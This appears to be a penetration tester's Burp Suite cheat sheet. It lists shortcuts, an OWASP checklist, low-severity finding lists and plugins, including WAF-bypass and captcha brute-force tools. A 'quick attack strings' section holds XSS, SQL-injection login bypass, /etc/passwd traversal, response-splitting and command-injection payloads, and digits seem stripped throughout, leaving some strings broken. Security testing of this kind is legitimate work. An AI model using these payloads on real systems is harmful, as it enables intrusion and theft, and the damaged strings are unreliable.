应用安全-工具使用-Burpsuite

A cheat sheet for PortSwigger Burp Suite application security testing framework.

Send to Repeater

Ctrl+R

Send to Intruder

Ctrl+I

Forward intercepted Proxy message

Ctrl+F

Toggle Proxy interception

Ctrl+T

Switch to Target

Ctrl+Shift+T

Switch to Proxy

Ctrl+Shift+P

Switch to Scanner

Ctrl+Shift+S

Switch to Intruder

Ctrl+Shift+I

Switch to Repeater

Ctrl+Shift+R

Switch to Suite options

Ctrl+Shift+O

Switch to Alerts tab

Ctrl+Shift+A

Go to previous tab

Ctrl+Minus

Go to next tab

Ctrl+Equals

##Editor

Cut

Ctrl+X

Copy

Ctrl+C

Paste

Ctrl+V

Undo

Ctrl+Z

Redo

Ctrl+Y

Select all

Ctrl+A

Search

Ctrl+S

Go to previous search match

Ctrl+Comma

Go to next search match

Ctrl+Period

URL-decode

Ctrl+Shift+U

URL-encode key characters

Ctrl+U

HTML-decode

Ctrl+Shift+H

HTML-encode key characters

Ctrl+H

Base64-decode

Ctrl+Shift+B

Base64-encode

Ctrl+B

Backspace word

Ctrl+Backspace

Delete word

Ctrl+Delete

Delete line

Ctrl+D

Go to previous word

Ctrl+Left

Go to previous word (extend selection)

Ctrl+Shift+Left

Go to next word

Ctrl+Right

Go to next word (extend selection)

Ctrl+Shift+Right

Go to previous paragraph

Ctrl+Up

Go to previous paragraph (extend selection)

Ctrl+Shift+Up

Go to next paragraph

Ctrl+Down

Go to next paragraph (extend selection)

Ctrl+Shift+Down

Go to start of document

Ctrl+Home

Go to start of document (extend selection)

Ctrl+Shift+Home

Go to end of document

Ctrl+End

Go to end of document (extend selection)

Ctrl+Shift+End

BASIC PASSIVE AND ACTIVE CHECKS:

Burpsuite Spider with intelligent form submission
Manual crawl of website through Burpsuite proxy and submitting INJECTX payloads for tracking
Burpsuite passive scan
Burpsuite engagement tools > Search > <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
Burpsuite engagement tools > Find comments
Burpsuite engagement tools > Find scripts
Burpsuite engagement tools > Find references
Burpsuite engagement tools > Analyze target
Burpsuite engagement tools > Discover content
Burpsuite Intruder > file/directory brute force
Burpsuite Intruder > HTTP methods, user agents, etc.
Enumerate all software technologies, HTTP methods, and potential attack vectors
Understand the function of the site, what types of data is stored or valuable and what sorts of functions to attack, etc.
ENUMERATION:
OPERATING SYSTEM
WEB SERVER
DATABASE SERVERS
PROGRAMMING LANGUAGES
PLUGINS/VERSIONS
OPEN PORTS
USERNAMES
SERVICES
WEB SPIDERING
GOOGLE HACKING
VECTORS:
INPUT FORMS
GET/POST PARAMS
URI/REST STRUCTURE
COOKIES
HEADERS
SEARCH STRINGS:
Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...

fname|phone|id|org_name|name|email
QUICK ATTACK STRINGS:
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...

Company
First Last
username
username@mailinator.com
Password123$
+
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt%00.png
https://google.com/.injectx/rfi_vuln.txt%00.html

//

INJECTX
'>"></INJECTX>(1)
javascript:alert()//
"><img/onload=alert(1)>' --
"></textarea><img/onload=alert(1)>' --
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!--
"><img/onload=alert(1)>' -- // INJECTX <!--
INJECTX'"><h1>X<!--
INJECTX"><h1>X
en%0AContent-Length%3A%%0A%0AHTTP%2F1.%%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%%0A%0AHTTP%2F1.%%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd%
{{+}}
sleep ; sleep  || sleep  | sleep  & sleep  && sleep
admin" or ""=""--
admin' or ''=''--
INJECTX%0a%0d%
OWASP TESTING CHECKLIST:
Spiders, Robots and Crawlers IG-
Search Engine Discovery/Reconnaissance IG-
Identify application entry points IG-
Testing for Web Application Fingerprint IG-
Application Discovery IG-
Analysis of Error Codes IG-
SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐
DB Listener Testing - DB Listener weak CM‐
Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐
Application Configuration Management Testing - Application Configuration management weakness CM‐
Testing for File Extensions Handling - File extensions handling CM‐
Old, backup and unreferenced files - Old, backup and unreferenced files CM‐
Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐
Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐
Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-
Testing for user enumeration - User enumeration AT-
Testing for Guessable (Dictionary) User Account - Guessable user account AT-
Brute Force Testing - Credentials Brute forcing AT-
Testing for bypassing authentication schema - Bypassing authentication schema AT-
Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-
Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness AT-
Testing for CAPTCHA - Weak Captcha implementation AT-
Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-
Testing for Race Conditions - Race Conditions vulnerability AT-
Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-
Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-
Testing for Session Fixation - Session Fixation SM-
Testing for Exposed Session Variables - Exposed sensitive session variables SM-
Testing for CSRF - CSRF SM-
Testing for Path Traversal - Path Traversal AZ-
Testing for bypassing authorization schema - Bypassing authorization schema AZ-
Testing for Privilege Escalation - Privilege Escalation AZ-
Testing for Business Logic - Bypassable business logic BL-
Testing for Reflected Cross Site Scripting - Reflected XSS DV-
Testing for Stored Cross Site Scripting - Stored XSS DV-
Testing for DOM based Cross Site Scripting - DOM XSS DV-
Testing for Cross Site Flashing - Cross Site Flashing DV-
SQL Injection - SQL Injection DV-
LDAP Injection - LDAP Injection DV-
ORM Injection - ORM Injection DV-
XML Injection - XML Injection DV-
SSI Injection - SSI Injection DV-
XPath Injection - XPath Injection DV-
IMAP/SMTP Injection - IMAP/SMTP Injection DV-
Code Injection - Code Injection DV-
OS Commanding - OS Commanding DV-
Buffer overflow - Buffer overflow DV-
Incubated vulnerability - Incubated vulnerability DV-
Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-
Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-
Locking Customer Accounts - Locking Customer Accounts DS-
Testing for DoS Buffer Overflows - Buffer Overflows DS-
User Specified Object Allocation - User Specified Object Allocation DS-
User Input as a Loop Counter - User Input as a Loop Counter DS-
Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-
Failure to Release Resources - Failure to Release Resources DS-
Storing too Much Data in Session - Storing too Much Data in Session DS-
WS Information Gathering - N.A. WS-
Testing WSDL - WSDL Weakness WS-
XML Structural Testing - Weak XML Structure WS-
XML content-level Testing - XML content-level WS-
HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST WS-
Naughty SOAP attachments - WS Naughty SOAP attachments WS-
Replay Testing - WS Replay Testing WS-
AJAX Vulnerabilities - N.A. AJ-
AJAX Testing - AJAX weakness AJ-
LOW SEVERITY:
A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.

Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP  codes/pages or other HTTP non- codes/pages.
Banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Click-Jacking and issues only exploitable through click-jacking.
CSRF on forms which are available to anonymous users (e.g. the contact form).
Logout Cross-Site Request Forgery (logout CSRF).
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Lack of Secure and HTTPOnly cookie flags.
Lack of Security Speedbump when leaving the site.
Weak Captcha / Captcha Bypass
Username enumeration via Login Page error message
Username enumeration via Forgot Password error message
Login or Forgot Password page brute force and account lockout not enforced.
OPTIONS / TRACE HTTP method enabled
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL Insecure cipher suites
The Anti-MIME-Sniffing header X-Content-Type-Options
Missing HTTP security headers
Security best practices without accompanying Proof-of-Concept exploitation
Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP  codes/pages or other HTTP non- codes/pages.
Denial of Service Attacks.
Fingerprinting / banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Clickjacking and issues only exploitable through clickjacking.
CSRF on non-sensitive forms.
Logout Cross-Site Request Forgery (logout CSRF).
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Lack of Secure/HTTPOnly flags on non-sensitive Cookies.
Lack of Security Speedbump when leaving the site.
Weak Captcha / Captcha Bypass
Login or Forgot Password page brute force and account lockout not enforced.
OPTIONS HTTP method enabled
HTTPS Mixed Content Scripts
Known vulnerable libraries
Attacks on Third Party Ad Services
Username / email enumeration via Forgot Password or Login page
Missing HTTP security headers
Strict-Transport-Security Not Enabled For HTTPS
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
Content-Security-Policy-Report-Only
SSL Issues, e.g.
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL weak / insecure cipher suites
Lack of SPF records (Email Spoofing)
Auto-complete enabled on password fields
HTTP enabled
Session ID or Login Sent Over HTTP
Insecure Cookies
Cross-Domain.xml Allows All Domains
HTML5 Allowed Domains
Cross Origin Policy
Content Sniffing Not Disabled
Password Reset Account Enumeration
HTML Form Abuse (Denial of Service)
Weak HSTS Age (, or less)
Lack of Password Security Policy (Brute Forcable Passwords)
Physical Testing
Denial of service attacks
Resource Exhaustion attacks
Issues related to rate limiting
Login or Forgot Password page brute force and account lockout not enforced
api*.netflix.com listens on port
Cross-domain access policy scoped to *.netflix.com
Username / Email Enumeration
via Login Page error message
via Forgot Password error message
via Registration
Weak password
Weak Captcha / Captcha bypass
Lack of Secure/HTTPOnly flags on cookies
Cookie valid after logout
Cookie valid after password reset
Cookie expiration
Forgot password autologin
Autologin token reuse
Same Site Scripting
SSL Issues, e.g.
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL weak / insecure cipher suites
SSL vulnerabilities related to configuration or version
Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP  codes/pages or other HTTP non- codes/pages.
Fingerprinting/banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Clickjacking and issues only exploitable through clickjacking.
CSRF on forms that are available to anonymous users (e.g. the contact form).
Logout Cross-Site Request Forgery (logout CSRF).
Missing CSRF protection on non-sensitive functionality
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Incorrect Charset
HTML Autocomplete
OPTIONS HTTP method enabled
TRACE HTTP method enabled
Missing HTTP security headers, specifically
(https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.
Strict-Transport-Security
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
Content-Security-Policy-Report-Only
Issues only present in old browsers/old plugins/end-of-life software browsers
IE <
Chrome <
Firefox <
Safari <
Opera <
Vulnerability reports related to the reported version numbers of web servers, services, or frameworks

插件

jsEncrypter.0.3  #对请求数据加密处理
HackBar.jar              
LFI scanner checks.jar        #LFI检测
burp-vulners-scanner-1.2.jar    #漏洞库对比
burplogger++.jar    #扩展日志模块
chunked-coding-converter.0.2.1.jar    #waf bypass
domain_hunter-v1.4.jar  #域名收集
knife-v1.4.jar   #字符转换
reCAPTCHA-v0.9.jar  #爆破验证码
sqlmap.jar  #sqlmap api
AES-Encrypter  
Assassin  #子域名爆破 | 旁注查询
AuthMatrix  #越权漏洞检测
Blazer  #AMF Messages
BurpAMFDSer  #AMF
BurpAuthzPlugin    #可用AuthMatrix代替
BurpCSJ
BurpDOMXSS
BurpHeartbleedExtension
BurpHistorytoMysql
BurpJDSer-ng
BurpJDSer
BurpMultiDEC
BurpNotesExtension
BurpPassiveXssScan
BurpPatchMe
BurpSentinel
BurpSessionAuth
BurpSmartBuster
BurpWebSphere
Burp_CustomScannerChecks
Burp_saml  #单点登录
DOMXSSHilight
J2EEScan  #可被LFI scanner checks取代
JSON
JavaScriptInjector  #JS注入
MobileMiTM  #中间人攻击
POST2JSON   
PT-Manager
Refeffer
SAMLRaider
W3af  #防火墙类型检测
WCF-Binary-SOAP-Plug-In  #WCF相关
Wsdler
Yara-Scanner  #恶意样本识别
aesburp AES Tool
autoEdit
burp-Curlit
burp-git-bridge
burp-massimpo
burp-msc
burp-protobuf-decoder
burp-radamsa
burp_Gwtscan
burp_JSBeautifier
burp_extension-googlehack
burp_extension_MultiScanner
burp_extension_nmap_parser
burp_extension_payloadparser
burp_wicket_handler
CSRFScanner #CSRF检测
distribute-damage
faraday
jsEncrypter add jsEncrypter.jar
scriptgen
sleepy-puppy
xssValidator
xssless
BurpCO2_v1_0_0RC1.jar
BurpFlashCSRFBuilder-0.1.4.jar
BurpKit.jar add BurpKit.jar
BurpMultiProxy.jar
BurpMultiProxy_ListVer.jar
BurpPlugin-full.jar
Burp_MultiProxy.py
GrabTencentExmailContacts.jar
JavaSerialKiller.jar
LICENSE
README
activeScan++.py
aesburp_fat.jar
burp-image-size.jar
burp-paramalyzer.jar
burp-retire-js-2.jar
burpbuddy-2.0.0.jar
bypasswaf.jar   #waf bypass 
changeu.py  
csrf-master.zip
key.bin
parrotng_v0.2.jar
rhinauditor-burp-plugin-1.jar
scriptgen-burp-plugin-3.jar
sentinelburp.xpi
shodanapi.py
sitemap-Import_links.py
threadfix-release-2.jar
update.bat
update.sh
ws.jar

宏（Macros）

功能：
（）通过页面的跳转验证当前的会话是否仍然有效；
（）执行登陆动作获取新的有效会话；
（）获取前一次HTTP请求响应的Token或其它参数，作为后续请求的输入参数（如CSRF Token的绕过）；
（）扫描或模糊测试时，执行一些先前请求，确保扫描请求能被正常执行；
（）测试请求执行之后，执行后续的请求操作（如结合Intruder使用不同账号登陆后进行批量投票）；